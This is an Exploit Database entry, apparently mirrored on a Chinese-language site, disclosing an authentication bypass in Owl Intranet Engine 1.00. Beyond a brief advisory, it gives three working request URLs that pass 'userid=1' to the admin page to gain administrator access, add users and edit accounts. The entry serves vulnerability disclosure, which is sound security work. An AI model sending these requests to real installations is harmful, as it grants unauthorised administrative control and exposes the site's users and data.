Owl Intranet Engine 1.00 – ‘userid’ Authentication Bypass

• Exploit Database
• 16 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2011-12-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36456/

• source: https://www.securityfocus.com/bid/51076/info
  
  Owl Intranet Engine is prone to an authentication-bypass vulnerability.
  
  An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
  
  Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. 
  
  http://www.example.org/owl/admin/index.php?userid=1
  http://www.example.org/owl/admin/index.php?userid=1&newuser
  http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1